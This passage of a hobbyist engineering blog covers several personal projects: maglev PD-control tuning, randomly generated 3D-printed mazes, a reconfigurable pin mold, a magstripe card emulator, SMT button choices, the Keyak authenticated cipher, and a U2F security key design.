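    tau = 1e-3         # s, coil lag: the force follows the command slowly (assumed)

    x, v, force = 1e-3, 0.0, 0.0   # start 1 mm off-center, at rest
    history = []
    for _ in range(steps):
        command = -(kp * x + kd * v)             # P term plus D term
        force += (command - force) * dt / tau    # first-order lag of the coil
        accel = (k_unstable * x + force) / mass
        v += accel * dt                          # semi-implicit Euler step
        x += v * dt
        history.append(x)
    return history


def peak(history, last=2_000):
    """Largest excursion (m) over the final `last` samples."""
    return max(abs(x) for x in history[-last:])


p_only = simulate(kp=25.0, kd=0.0)
pd = simulate(kp=25.0, kd=0.2)
print(f"P only: {peak(p_only) * 1e3:.3f} mm, PD: {peak(pd) * 1e3:.5f} mm")
```

With these assumed values, the P-only run should end with larger swings than the 1 mm it started with, while the PD run settles toward the center. Real gains would have to be tuned on the actual hardware.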

My original design had some high pass filtering which acts as a "D" component. But it wasn't good enough. I switched to a Teensy and wrote the PD control loop there to get something quickly.

I made a pretty good workflow for tuning the PD parameters and it responded about every 10 μs, which is pretty good considering the oscillations are above 0.01 s in period.

But no matter the PD parameters, it still didn't work. If I "fixed" either the X axis or the Y axis with a jig, it worked. But never together. And overshoot wasn't the issue anymore. It would be stable in the X and Y, and then start oscillating in the Z, which would mess with my precious X and Y PD parameters and throw it off. I guess when all electromagnets are on, they pull the magnet down a bit, and when the electromagnets switch direction, the magnet shoots up, causing the oscillation.

It needed just a wee bit of damping to slow it down. I added some steel sheet cutouts to the top of the levitating magnet. This damps it by making it heavier. It also causes an attraction to the ring magnet and I think that contributes to damping.

And finally, it works!

The next improvements

The design is still far from perfect. It only tolerates about a 30 degree change in orientation before the magnet falls. I need at least 90 degrees. My PD parameter tuning may be over but there are some more parameters I need to tune.

Coil inductance. A larger coil inductance means it takes longer for the control loop to actually change the magnetic field. A series inductor acts like a low pass filter. So while my control loop frequency was about 100 kHz, the inductance of my electromagnets actually limits it to somewhere between 1 and 10 kHz. I need to try reducing the number of turns per coil. If I halve the number of turns, it halves the magnetic field strength (for the same current) and quarters the inductance. This might be a good trade-off.

Electromagnet height. Making an electromagnet longer provides diminishing returns for increasing field strength. So reducing the length could provide another good inductance vs. field strength trade-off.

Levitating magnet weight and iron component. Making the magnet heavier certainly adds a damping effect. But I would like it to be light enough to hold at 90 degrees. And adding magnetic material to it causes an attraction to the ring magnet, which I think provides a damping effect but I'm not sure.

I'm fairly sure that the coil inductance and the magnet weight are closely related. I think by reducing the inductance, I'll be able to support a smaller magnet. Another thing I could do is increase the driving voltage but that adds some circuit complexity.
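As a rough sketch of the turns trade-off, the scaling can be worked out in a few lines of Python. The starting inductance and resistance below are placeholder numbers, not measurements of these coils, and the helper names are hypothetical. The sketch assumes the same core and geometry (so inductance scales with turns squared) and the same wire (so resistance scales with turns), and it treats the coil as a simple series RL low-pass filter.

```python
import math


def scale_coil(inductance_h, resistance_ohm, turns_ratio):
    """Scale inductance (L ~ N^2) and resistance (R ~ N) for a new turn count.

    turns_ratio is new_turns / old_turns; same core, geometry and wire assumed.
    """
    return inductance_h * turns_ratio ** 2, resistance_ohm * turns_ratio


def rl_cutoff_hz(inductance_h, resistance_ohm):
    """-3 dB corner frequency of the series RL low-pass formed by the coil."""
    return resistance_ohm / (2 * math.pi * inductance_h)


L0, R0 = 1e-3, 10.0                  # assumed: 1 mH, 10 ohm
L1, R1 = scale_coil(L0, R0, 0.5)     # halve the number of turns

print(f"before: {rl_cutoff_hz(L0, R0):.0f} Hz, after: {rl_cutoff_hz(L1, R1):.0f} Hz")
print("field per amp scales by 0.5, inductance by", L1 / L0)
```

Under these assumptions, halving the turns doubles the corner frequency while halving the field produced per amp. Whether that is a net win depends on how much current the driver can supply.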

Parameter hell

I would really like to model this and make some well founded estimates on what everything should be, based on my 90 degree orientation constraint and optimizing for a small magnet size. But I'm not sure how to relate everything. If anyone could provide some thoughts on this, I would greatly appreciate it.


Randomly generating 3D mazes to 3D print

I recently got a 3D printer for home prototyping. One thing I wanted to make was a puzzle that took advantage of the strengths of 3D printing. I didn't really find anything I liked on Thingiverse so I decided to write a program to randomly generate 3D mazes.

Randomly generating a maze

Mazes can be represented as a discrete set of vertices and edges, i.e. a graph. Imagine a grid of squares, where some of the sides of the squares are missing. Each square is represented by a vertex, and a missing side of a square is represented by an edge. To randomly generate a maze, we can start with a set of vertices with no edges, or a grid of squares with no breaks. The number of vertices is determined by how big we want the graph to be. Then, we add edges, or "breaks," to the vertices until the maze is complete.

The resulting graph representing a classical maze has a few properties. It is connected, meaning there is a path connecting any two vertices, i.e. no vertices are isolated from each other. The graph is also a tree, meaning it has no loops (trees are also connected). I.e. for any two vertices, there is only 1 path between them. While mazes can have loops, it is something you can easily add afterwards by randomly adding edges, so I will ignore loops.

There are multiple algorithms that can randomly generate trees on a set of vertices. I decided to use Prim's algorithm because it has a defined starting point. So it may generate mazes that are easier to solve in reverse, thus providing a hint to the person trying to solve it. 3D mazes can get pretty hard.

My program

I wrote a Python program that uses randomized Prim's algorithm to generate a graph that represents a 3D maze. It is similar to a grid of squares with "breaks" in it, except it is cubes instead of squares. The graph is passed to a set of functions that output openscad code based on the graph nodes and how many walls they had broken.
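For readers who want to see the idea in code, here is a minimal sketch of randomized Prim's algorithm on a cubic grid. It is not the program from the repository; `neighbors` and `generate_maze` are hypothetical names, and the maze is returned as a plain dictionary mapping each cell to the set of cells it is connected to.

```python
import random


def neighbors(cell, size):
    """Yield the up-to-six grid neighbors of a cell inside a size^3 cube."""
    x, y, z = cell
    for dx, dy, dz in ((1, 0, 0), (-1, 0, 0), (0, 1, 0),
                       (0, -1, 0), (0, 0, 1), (0, 0, -1)):
        n = (x + dx, y + dy, z + dz)
        if all(0 <= c < size for c in n):
            yield n


def generate_maze(size, start=(0, 0, 0), seed=None):
    """Return a random spanning tree of the grid as {cell: connected cells}."""
    rng = random.Random(seed)
    maze = {start: set()}
    # Each frontier entry is a wall between a visited cell and a neighbor.
    frontier = [(start, n) for n in neighbors(start, size)]
    while frontier:
        # Pick a random wall; swapping it to the end makes removal cheap.
        i = rng.randrange(len(frontier))
        frontier[i], frontier[-1] = frontier[-1], frontier[i]
        inside, outside = frontier.pop()
        if outside in maze:
            continue  # already reachable; breaking this wall would add a loop
        maze[inside].add(outside)   # break the wall in both directions
        maze[outside] = {inside}
        frontier.extend((outside, n) for n in neighbors(outside, size)
                        if n not in maze)
    return maze


maze = generate_maze(3, seed=1)
print(len(maze), "cells,", sum(len(v) for v in maze.values()) // 2, "broken walls")
```

Because the result is a tree, a maze with N cells always has N - 1 broken walls, which is a handy sanity check.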

Below are some building blocks that get used to build the 3D maze based on each vertex in the graph and how many edges/walls it has.

Here is an example 5x5 maze.

The start is marked in orange and the exit is marked in red. The exit is chosen by finding the node that is furthest from the start while still being on an outside face. Ideally, the exit is one of the leaves of the tree.
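The exit rule described above can be sketched with a breadth-first search. This is an illustration under assumptions, not the code from the repository: `pick_exit` and `path_to_maze` are hypothetical names, and the maze is assumed to be a dictionary mapping each cell to its connected cells. The tiny 2x2x2 example is hand-built as a single winding path, so every cell happens to be on an outside face.

```python
from collections import deque


def pick_exit(maze, start, size):
    """Return the outside-face cell that is furthest (in steps) from start."""
    dist = {start: 0}
    queue = deque([start])
    while queue:                      # breadth-first search from the start
        cell = queue.popleft()
        for nxt in maze[cell]:
            if nxt not in dist:
                dist[nxt] = dist[cell] + 1
                queue.append(nxt)
    on_face = [c for c in dist
               if c != start and any(v in (0, size - 1) for v in c)]
    return max(on_face, key=dist.get)


def path_to_maze(path):
    """Build the adjacency dictionary for a maze that is one long corridor."""
    maze = {cell: set() for cell in path}
    for a, b in zip(path, path[1:]):
        maze[a].add(b)
        maze[b].add(a)
    return maze


corridor = [(0, 0, 0), (1, 0, 0), (1, 1, 0), (0, 1, 0),
            (0, 1, 1), (0, 0, 1), (1, 0, 1), (1, 1, 1)]
tiny = path_to_maze(corridor)
print(pick_exit(tiny, (0, 0, 0), size=2))   # the far end of the corridor
```

In a tree there is exactly one path between any two cells, so the breadth-first distance is also the length of the solution.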

3D Printing

To 3D print this, you need to make the paths cut out of something else. I added a couple options to my program. You can subtract the maze tunnels from a large cube, making a solid where you cannot see the paths inside. Or you can subtract a scaled down version of the maze from itself so it hollows out the tunnels, pictured below.

I decided this looked the coolest. And because it is a mesh of tunnels, it would be hard to fabricate by conventional means. No problem for 3D printing! The largest challenge at this point is time. The model itself takes on the order of hours to render in openscad. Printing could take on the order of days, especially if you include support material. Then it could take a while to remove the support material.

I first tried going small, printing a simple 3x3 maze.

With PVA support material, it took about six hours to print and a few days to fully dissolve away the PVA with a bowl of water.

I decided to make one improvement by slicing small holes in all nodes of the maze, so all the internal PVA supports dissolve much quicker.

Here is a 7x7 version with PVA supports. It is about 70mm cubed.

It took just over 3 days to print. It took another two days to dissolve the PVA. The small cutouts turned out to be pretty effective at getting rid of the internal PVA supports.

I got a small ball bearing to test out playing it. It is a little difficult to navigate as the ball falls past paths quickly. I haven't solved it yet and I'm not sure how much playing in reverse helps. 7x7 might be a little extreme.

I should have added a solution output to my program.

Wrap up

As usual, my program is on Github. If you try it out, let me know if you have any success.


Proof of concept for a reconfigurable mold

If you want to mass produce some physical product in a short amount of time, chances are you would need to get a mold made. Most plastic parts get made via a plastic injection molding process, where molten plastic is injected into a mold cavity under high pressure, cooled quickly, and then ejected. For mass production to work, the mold needs to be durable enough to last for thousands of injections. Commonly they are made out of steel.

It is nontrivial to create one of these molds as it costs on the order of thousands of dollars. Thus it can be intimidating to get into this process at first because of the cost. If molds could be reconfigured such that they could easily be reused for different parts, then a lot of money could be saved.

I recently got interested in plastic injection molding and also wanted to get better at mechanical design. So I thought I would try to design my own reconfigurable mold. It ended up not being practical and more of a proof of concept. Here I show what I made and its results.

Reconfigurable Pin Tooling

Reconfigurable pin tooling is an idea where you have a discrete bed of pins that make up the mold surfaces. Each pin can be actuated to replicate any "moldable" part design. The following figure from [1] shows the basic idea using 2 surfaces. A complete mold would need 6 surfaces.

From [1]

Reconfigurable pin tooling is not a new idea. In fact, patents for reconfigurable pin tooling systems go back at least 1-2 centuries [2]. There are many different designs. Some put smooth, elastic surfaces above the pins and others devise clever ways to actuate each individual pin.

My design

I tried to make it as simple as it could possibly be. I didn't look into actuating each pin but figured I could press the matrix of pins into the surface of the part that is being molded. Then, there would just need to be some way to "lock" the pins in place. After locking the pins in place, you have 1/6 of the possible surfaces needed to replicate the part in a mold!

As for the locking mechanism, I decided to make a 2-dimensional vice that would hold the pins in place from 4 sides. I coded up the design in openscad and parameterized it such that I could get renderings of it in open and closed positions.

Here is a rendering of the vice opened with a bed of pins floating in the middle.

Now the pins have been "pressed" against a surface of an arbitrary part, effectively creating a mold of it.

By closing the vice, the pins are held in place.

I figured this would be enough to start with. The design could be implemented by making parts for the walls of the vice and ordering parts for various rods, nuts, and bearings. I would also need to find a source for suitable pins.

Implementation

I 3D printed parts for the vice and also used parts that I ordered from McMaster. I used openscad for the design, which I really like since it's fully parametric. So I can design the vice any way I want at first, and when I pick out parts from McMaster, I just need to change a few variables to ensure the design will fit the parts. Going the other way around (fitting the parts to the design) isn't always so easy. (Edit: I've since changed to Fusion360. Way better for most things.)

Here is my 2D vice. By turning the threaded rods with the thumb screws at the end, it pushes on the internal walls, which slide on nylon bearings. So to tighten the vice completely, you need to turn six rods (not convenient, but works).

Here is the vice tightened on a bed of pins.

For the pins, I just used the smallest steel key stock available online. The smallest I found was 1/16in x 1/16in on McMaster. While each pin is individually cheap, the pins still end up being the most expensive part of the design, because you need a lot of them to implement any moderately sized surface. To avoid high costs I designed for a surface that was only just over 1 square inch. Since it's pretty small, the 1/16in key stock resolution really sticks out. It still works, but for this to be practical, the ratio of surface size to pin cross-section would have to be much bigger or parts will look too chunky.

I tested the mold using silicone molding compounds (not under pressure). The part I molded against was a simple 6-sided die.

As you can see, my replicated 6-sided die is pretty chunky! I didn't bother to test its fairness. While this molding technique is certainly reconfigurable, resolution takes a hit. It would also have some serious problems when put under high pressure. For example, molten plastic would seep in-between the pins.

I tried brainstorming some ideas to fix problems with "chunkiness" and high pressure. Maybe the pins could be coated with some temperature and pressure resistant glue before using the mold. Then it could be removed mechanically or chemically when it comes time to reconfigure. Maybe the molten plastic / silicone could be placed in a special balloon that would inflate inside the mold under pressure, and could be removed after the part cools.

I haven't really come up with anything that I really liked. If anyone has any ideas, I would love to hear them.

Putting the pins in the vice

One problem that came up was that it was really hard to place the pins in the vice and keep them all square with respect to one another. If you simply place them in the vice and tighten, they end up as a jumbled mess.

I solved the problem by creating a fine stainless steel mesh that I could put the pins inside first. It serves as an alignment tool before placing the pins in the vice. Putting roughly 300 pins in the mesh wasn't fun but it worked quite well.

I was able to get these meshes made by OSH Stencils, which is a company that makes cost effective stencils for soldering electronics. Turns out it is perfect for making pin matrix alignment tools. They use an industrial laser to cut 0.004" stainless steel sheet. And the tolerances are really good, all around 0.001". I got my stencils for like $15-20.

Conclusion

Reconfigurable pin tooling is pretty cool but far from practical, I think. It is expensive to get enough pins to mold large surfaces, though that would be worthwhile if the molding process worked well. But as far as I can tell, it's nowhere close to working as well as conventional molds. Problems with "chunkiness" and pressure remain. If you have any ideas, let me know!

[1] Bahattin Koc, Sridhar Thangaswamy, Design and analysis of a reconfigurable discrete pin tooling system for molding of three-dimensional free-form objects, Robotics and Computer-Integrated Manufacturing, Volume 27, Issue 2, April 2011, Pages 335-348, ISSN 0736-5845.

[2] Munro C, Walczyk D. Reconfigurable Pin-Type Tooling: A Survey of Prior Art and Reduction to Practice. ASME. J. Manuf. Sci. Eng. 2007;129(3):551-565. doi:10.1115/1.2714577.

[3] My openscad design files, https://github.com/conorpp/reconfigurable-pin-matrix


Last post on emulating a credit card

This is an update to a previous post about designing a credit card emulator. I got a custom made coil and it didn't work. I'm concluding the project here.

I first attempted to generate a magnetic field using only PCB traces as this would be easy and cost effective to create. But the field was not strong enough to be read by an external reader. I then wound my own coil with 36 gauge magnet wire such that it had a much higher coil density while still being as small as a mag-strip track. This worked but only when I held the card still in the reader -- if I moved the card while sending a signal (emulating a swipe), the reader would often fail to read the signal sent. I hypothesized that since my coil was crudely hand wound using a power drill, it had slightly non-uniform windings which caused significant variations in magnetic field as the non-uniform coil moved past the reader.

What I should have done at this point was invest some time in making a setup to read the full signal on an oscilloscope and experiment further. I was feeling somewhat impatient with this project at this point though, so I went ahead and got a coil wound by a shop that could get much more uniform windings.

custom coil

custom coil

Pictured above is my "uniform" coil, shown on its own and Kapton-taped to a mag-strip blank. I tried it on my previous setup with a mag-strip reader and unfortunately it did not work. The signal ended up being too weak, even when driving 0.5 amps through it. The coil is uniform, but it probably has too low a coil density because I did not specify this well when I ordered it. I have lost interest in this project but I'll conclude it with some takeaways.

Better testing means less iteration. My testing environment consisted of a driver circuit with some test credit card numbers and a mag-strip reader. This basically just gave me a boolean answer to whether my design worked or not. Instead of trying out many different designs on this setup, it would have been better to put more time into improving the test setup with an oscilloscope so I could see more, and then try out only a couple of designs. Then by the time it came to order a custom coil, I would have had a better idea of the parameters to use. This seems obvious in retrospect but I think I had tunnel vision on this project while grad school demanded most of my attention.

The optimal coil for mag-strip emulation. It probably can't be done with PCB traces unless you drive a ton of current (5+ amps), which is impractical for credit card form factors. It will need to fit in a box roughly the size of 3in x 0.11in x 0.07in. I don't know of any off-the-shelf coils that would fit those dimensions, so you will likely need to have one custom made.

Synchronization. For emulation to work, the signal needs to be sent through the coil when it is in range of the credit card reader, not a moment sooner or later. How could it possibly know when? My idea was to use small buttons to act as one bit pressure sensors, which would get activated when a credit card is swiped through a reader. I was looking into using metal domes like from snaptron which come in ideal form factors and force ratings. I got the buttons but didn't make enough progress to try them for this purpose.

If anyone has a use for the coils or PCBs I made, let me know. I'm not going to use them.


Designing a credit card emulator card

What this project is

Some time ago I got interested in emulating magstripes with electromagnets. There are some other projects that have done this, like magspoof. What I am really interested in figuring out is how to get the form factor to the size of a credit card. Arguably there isn't much utility to this except maybe storing multiple magstripe cards on one card, like some commercial products do. But I still think it's cool and I'd like to make it into a badge for the next DefCon.

Design challenges and fails

A normal magstripe card is embossed with a magnetic strip which holds either 75 or 210 bits per inch normally. You can picture it as taking a bunch of tiny magnets and laying them out with the poles pointing up and down the stripe. When you swipe the card, all the little magnets go by the reader, and the reader sees the magnetic polarity change a bunch of times.

You can emulate it easily with an electromagnet by just changing the current direction (a magstripe reader will see the same changes in polarity). One thing people might initially be confused by is how the reader "clocks" the data in. Different people swipe cards at different speeds, so how does the reader synchronize the data? The information is encoded in F2F. Basically the little magnets are sized such that the polarity changes at two rates, where one rate is always twice the other. So the reader can synchronize by looking at the relative timing of the polarity changes. A binary zero is a single pulse spanning the whole bit period, while a binary one is two pulses that are each half as long.
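Here is a minimal sketch of F2F encoding in Python, to show what the coil polarity would look like over time. In F2F the polarity flips at the start of every bit cell, and a 1 adds one more flip in the middle of the cell. The function names are hypothetical, and the decoder is deliberately naive: it assumes it already knows where each bit cell starts, whereas a real reader recovers the timing from the swipe itself.

```python
def f2f_encode(bits, level=1):
    """Return the coil polarity (+1 or -1) for each half of every bit cell."""
    halves = []
    for bit in bits:
        level = -level          # every bit cell starts with a polarity flip
        halves.append(level)
        if bit:
            level = -level      # a 1 adds a second flip in the middle
        halves.append(level)
    return halves


def f2f_decode(halves):
    """Recover bits, assuming the half-cell boundaries are already known."""
    return [1 if halves[i] != halves[i + 1] else 0
            for i in range(0, len(halves), 2)]


signal = f2f_encode([0, 1, 1, 0])
print(signal)               # [-1, -1, 1, -1, 1, -1, 1, 1]
print(f2f_decode(signal))   # [0, 1, 1, 0]
```

To drive a coil, each entry would map to a current direction held for half a bit period.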

Electromagnet design

The hardest part of this project I believe is getting a proper coil and enough current to run through it so the magnetic field is strong enough. I first tried seeing if traces on a 2 layer PCB could suffice to generate a magnetic field strong enough for a reader.

The ISO specs don't actually specify the magnetic field strength that is needed, but rather say something along the lines of "it should be between 0.7 and 1.2 times that of a reference card." I couldn't really theorize much so I just went ahead and tried it.

This is front and back of the first PCB card I tried. I drove it using a similar circuit as in magspoof and tested it with a real magstripe reader.

The traces are going up/down the card in the two magstripe track locations so that the magnetic field generated would be pointed up/down the stripe like in a real magstripe.

I tried to maximize the number of turns per length in an attempt to make the field stronger but I didn't think of the major field cancellation that would occur since the traces on front/back of the card are aligned to each other. Needless to say, it did not work.

For this next iteration, I half fixed the field cancellation issue. I drew the front and back traces to be at a 45 degree angle with respect to each other. So there would still be cancellation, but it would be half as much as before. I figured that if using a 2 layer PCB for this purpose is going to work at all, this was the way to draw it. But I'm no electrical engineer; if anyone has any other ideas, please comment or contact me.

It worked a little bit with the magstripe reader. I made a crude test with iron filings to compare the magnetic strength of the PCB traces with a credit card to see if it fell within the "0.7 to 1.2" factor range.

I ran about 2 amps through the PCB traces and the amount of iron filings that stuck to the coil was dismal compared to the credit card. I figure the only thing that could work after this is a custom made coil.

Next attempt

I made my own coils using 36 gauge magnet wire, plastic, tape, and a drill. Running it through the reader, it seemed to work pretty reliably.

I ordered some custom shaped coils that are uniform and thin enough to fit in a credit card form factor. I did this by searching on Alibaba and emailing some drawings.

I will make an update later on!

Acknowledgements

Thanks to PCB minions for making good PCBs and having good service.


A review of some SMT buttons

A review of surface mount buttons

I haven't posted in a long time and I am now finally making updates. I'm going to start with something super exciting (not really). This is a brief review of some surface mount buttons. Tactile push buttons, to be specific.

When picking out a button I'm tempted to just purchase a bunch of different ones to see which one I like since it's hard to get a feel for ergonomics from an online distributor like Digikey. So this is to post pictures of what I ordered and to make some comments for other people looking for the perfect SMT button.

The buttons

Vanilla option

The most basic button I think most SMT projects get. Relatively big, easy to push. The color sticks out.

Links:

Low profile, good area

I like this type since it's pretty easy to push, a lower height, and a nicer color profile. Soldering it by hand might be a little more difficult.

Link.

Small area, still good tactile feedback

This is an even smaller button and still has good tactile feedback. Since it has smaller surface area to press, I think it's not quite as easy to give input via finger as the other options.

Link. Worth noting that the color of the button in the image is not necessarily the real color of the button.

Really small, bad feedback

These are the smallest buttons I got. They definitely don't provide good tactile feedback and are relatively difficult to press using just a finger. These would be good for when you don't want the button to be pressed by accident -- a person would have to grab a pen or something and very deliberately press it.

Links:

Metal domes

These are quite different from all the rest. Metal domes, as offered by snaptron, come in a lot of different shapes and sizes. One thing that I like is that they are all rated by the amount of force required to "press" the dome in. I got a nice sample to test out using these domes as small, 1 bit pressure sensors. They can't be soldered, but there are a couple other methods to attach them to a PCB, all pick and place compatible.

What am I missing?

Currently this is a small list. Send me a message if you think I missed something. I appreciate mail and I will update my post if I get anything.


Keyak: a candidate for the authenticated encryption standard

New authentication cipher

Keyak is an authenticated encryption scheme based on the Keccak sponge primitive. It is a candidate in the CAESAR competition for authenticated encryption. For those not familiar, Keccak is the algorithm behind the recent hashing standard, SHA-3. The sponge primitive is a neat construction. By itself, it is a secure hashing primitive, but it can easily be extended to provide encryption, pseudo random number generation, and authentication primitives.

In this post, I will explain how Keyak works by explaining how one can build upon the sponge primitive. Then I will share how my research group is planning to optimize it for performance.

So what is an authenticated cipher again?

Not surprisingly, it's a crypto algorithm that provides both confidentiality and authentication to communicating parties. AES (the current encryption standard) only provides confidentiality; it protects from eavesdropping but provides no mechanism to tell whether you are communicating with a friend or a potential foe.

Why not just keep using HMACs?

An HMAC (hash-based message authentication code) will provide authentication but relies on hash algorithms separate from the cipher being used. Many different ciphers and hashes can be combined to provide authenticated ciphers, each with different trade-offs.
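For reference, the HMAC half of that combination looks like this with Python's standard `hmac` and `hashlib` modules. This is only a sketch of the tagging step: the ciphertext is assumed to come from some separate cipher that is not shown, and `make_tag` and `verify_tag` are hypothetical helper names.

```python
import hashlib
import hmac


def make_tag(mac_key: bytes, ciphertext: bytes) -> bytes:
    """Compute an HMAC-SHA256 tag over the already-encrypted message."""
    return hmac.new(mac_key, ciphertext, hashlib.sha256).digest()


def verify_tag(mac_key: bytes, ciphertext: bytes, tag: bytes) -> bool:
    """Recompute the tag and compare it in constant time."""
    return hmac.compare_digest(make_tag(mac_key, ciphertext), tag)


mac_key = b"a separate key just for the MAC"
ciphertext = b"...bytes produced by some cipher..."
tag = make_tag(mac_key, ciphertext)
print(verify_tag(mac_key, ciphertext, tag))          # True
print(verify_tag(mac_key, ciphertext + b"!", tag))   # False
```

Note that this needs a second key and a second pass over the data, in addition to whatever the cipher does.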

However, using two algorithms combined is relatively inefficient. Also, because of the lack of a standard, unnecessary complications may arise. TLS, for example, has had a fair share of attacks, many of which can be attributed to the complicated nature and diverse cipher support of TLS.

And when security relies on a complicated protocol, it becomes difficult to program. Remember Heartbleed? Goto fail? BERserk?

How Keccak comes into play

To start, let's make our own cipher that is based on Keccak and develop it until it is like Keyak.

The Keccak sponge construction is illustrated below. All you need to understand is that it absorbs up to 1600 bits at a time and outputs a 1600 bit permutation. Any additional input can be XOR'd into the output block of a permutation round ƒ and applied to another ƒ. Rinse and repeat.

Above, the permutation ƒ is repeated 4 times in the "absorbing" stage for the input and 2 times in the "squeezing" stage for the output. I.e. a 6400 bit message M is input and a 4800 bit hash Z is output.

Keccak specifically parameterizes how many rounds it should go through in each ƒ and then how much output should be pulled at the end for the final hash. But for our purposes, it isn't necessary to think about parameters. Let's implement our cipher.

Instead of feeding input to ƒ, we can first input a secret key (and nonce). I.e. we initialize the sponge state with our secret key. This will ensure all of our following applications of ƒ are unique and full of entropy.

Now notice that each time we apply ƒ to the sponge, we get, in a way, a new "hashed" version of our secret key. We get 1600 bits of new "hash" each time and we can do this as much as we want. It is these "hash-like" blocks that we can XOR our message with. It's like a pseudo one time pad.

Our recipient, who has the same secret key (and nonce), can compute the same "hash-like" blocks. Upon receiving the ciphertext, he can XOR it with his computed "hash-like" blocks to get the clear text message.

Pretty nice, huh? The security of the cipher is based on the security of Keccak, which we can take some comfort in.

Adding simple and strong authentication

We're still missing the big picture: authentication. Our cipher currently only yields confidentiality. Let's add a couple more steps.

So instead of just reapplying ƒ to the secret key to get a bunch of "hash-like" blocks, we will include the message XOR'd in each input before reapplying ƒ to get the next block. That way each new block is based on the initial secret key and the message being enciphered. After the whole message has been encrypted, we can run ƒ one more time to get a block that we will simply use as our authentication tag.

Since this authentication tag relies on the sponge state that is a byproduct of the secret key and the enciphered message, only recipients with the exact secret key and unaltered ciphertext can recompute it.

In the figure, K is our secret key and α0 is the nonce and padding. Let's say that M is our clear text message. For each block of M, the sender will XOR it with a "hash-like" block Z to make a block of cipher text, α. As long as there are blocks of M left, the most recent α will be input to ƒ to create a new Z. After all message blocks are enciphered, the last α will be input to ƒ again to create the authentication tag.

The receiver pretty much does the same thing except that he starts with the blocks of ciphertext (α) rather than the plaintext. The message is revealed by simply calculating Z XOR α one block at a time.

Now for the exciting part.

The receiver can then apply ƒ one more time after decryption to recompute the authentication tag. If it's equal to the received authentication tag, then the message is authentic!
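To make the data flow concrete, here is a minimal C sketch of the simplified scheme described above. It is not Keyak and it does not use Keccak: `toy_f` is a made-up stand-in permutation on a tiny 256-bit state, every block is a single 64-bit word, and padding is left out. All names are hypothetical and nothing here is secure; it only shows how Z, the ciphertext, and the tag relate.

```c
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for the permutation f. This is NOT Keccak-f and NOT secure;
 * it only mixes a small 4-word state so the data flow can be followed. */
static uint64_t rotl64(uint64_t v, unsigned n) {
    return (v << n) | (v >> (64 - n));   /* n is always in 1..63 here */
}

static void toy_f(uint64_t s[4]) {
    for (uint64_t round = 0; round < 12; round++) {
        s[0] += s[1]; s[3] = rotl64(s[3] ^ s[0], 32);
        s[2] += s[3]; s[1] = rotl64(s[1] ^ s[2], 24);
        s[0] += s[1]; s[3] = rotl64(s[3] ^ s[0], 16);
        s[2] += s[3]; s[1] = rotl64(s[1] ^ s[2], 63);
        s[0] ^= round;                   /* round constant */
    }
}

/* Encrypts (decrypt == 0) or decrypts (decrypt != 0) n one-word blocks
 * and returns the authentication tag. out may alias in. */
static uint64_t toy_wrap(uint64_t key, uint64_t nonce,
                         const uint64_t *in, uint64_t *out, size_t n,
                         int decrypt) {
    uint64_t s[4] = { key, nonce, 0, 0 };  /* K and the nonce seed the state */
    toy_f(s);
    for (size_t i = 0; i < n; i++) {
        uint64_t z = s[0];                 /* "hash-like" block Z */
        uint64_t x = in[i];
        out[i] = x ^ z;                    /* Z XOR M, or Z XOR ciphertext */
        s[0] = decrypt ? x : out[i];       /* the ciphertext block feeds f */
        toy_f(s);
    }
    return s[0];                           /* output of the last f is the tag */
}
```

A sender would call `toy_wrap(key, nonce, msg, ct, n, 0)` and transmit `ct` with the returned tag. The receiver calls it with `decrypt` set to 1 and accepts the plaintext only if the tag it computes matches the one received.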

This is the basis for Keyak. I find it to be quite clever and superior to current authenticated crypto systems. Not only is it based on Keccak, but it combines encryption and authentication into one innate process. This sure beats the canonical method of encrypting and then calculating an HMAC over it.

Get prepared for creativity

There is certainly more to Keyak than the simple process I described. It supports metadata which can be sent as cleartext but will be included in ƒ's input so that it is still authenticated. It can be parameterized to set the block size, Keccak permutation used, and number of encryption processes to run in parallel. Yup, Keyak supports parallelism as well.

My impression is that Keyak is modeled after a motor boat. It has the following layers:

  • Motorist layer: responsible for handling the parameters. The motorist starts an "engine" which can be fed input (either ciphertext or plaintext) to be wrapped, where wrapping can be encrypting or decrypting. If decrypting, an authentication tag will also be input and verified, and the engine will return the plaintext only if the verification succeeds. If encrypting, ciphertext with a corresponding authentication tag will be output.

  • Engine layer: responsible for distributing blocks of input to its various pistons and piecing together the piston output.

  • Piston layer: where the work actually gets done. Each piston can be initialized with a secret key and nonce. Each piston applies ƒ to a particular input to update the sponge state with a new "hash-like" block (Z). They do the wrapping of the input with the "hash-like" blocks to get the ciphertext or plaintext as in our simple algorithm above.

The pistons do the bulk of the work and each one is independent of the other. This allows them to be run in parallel for performance.

Optimizing Keyak for performance

For a naïve optimization, Keyak could be parallelized using thread level parallelism by simply assigning a thread for each piston. It's a little overkill since each thread would be redundantly executing the same instructions, just on different data.

Let's consider Flynn's Taxonomy which contains 4 classifications for computer architectures.

  • SISD (single instruction, single data) executes one instruction at a time on one piece of data. Each of your regular CPU cores does this.

  • MISD has multiple instructions executing in parallel for the same piece of data. This is not common but could be useful for fault tolerance.

  • SIMD has one instruction execute for multiple pieces of data. This is common in graphics processing and is abundant in GPUs.

  • MIMD is multiple instructions executing in parallel for different pieces of data. Modern CPUs do this by having multiple cores.

So pistons in Keyak are each running the same instructions, but each on different data. Any idea which architecture would be most efficient for optimizing Keyak?

If you think it's SIMD (single instruction multiple data), then you are right!

My research group will be looking into using SIMD to optimize Keyak. Since SIMD is commonplace in graphics, we will be implementing Keyak optimizations on a GPU.

Wrapping it up (pun intended)

Keyak is a great study. Not only is it a good read for its overarching Engine metaphor, but it's a completely different way to do encryption from an algorithmic standpoint. It's totally different from the typical substitution-permutation networks that many current ciphers are based on, including AES. It's kind of weird, really; but that's likely a good thing for a contender in the CAESAR competition.

This is a high level post; to learn more check out the Keyak website and the paper below.

References

/

Designing and Producing 2FA tokens to Sell on Amazon

I made a two factor authentication token and have made it available on Amazon. In this post I'll talk about the design, how I produced it affordably, and some metrics about selling on Amazon. If you're interested in doing something similar, you can copy everything as it's all open source.

Update: I've replaced this project with a superior security key, Solo.

The design

It uses the U2F protocol, which is a standard developed by the FIDO Alliance and Google. U2F uses challenge response for authentication and is based on the P-256 NIST Elliptic Curve. FIDO additionally provides U2F standards for transports like USB, Bluetooth, and NFC which makes a project like this ideal.

I decided that a U2F token would need to meet 3 core requirements:

  1. A good source of randomness to generate keys.
  2. Strong computation for the crypto (using an 8 bit processor would be too time consuming).
  3. Tamper resistance. Hard to duplicate.

I chose to use the following components to implement the design (in order of importance):

  • ATECC508A - Atmel chip that securely implements P-256 signatures and key generation *.
  • EFM8UB1 - Cheapest microcontroller with USB.
  • RGB LED - Better user experience.
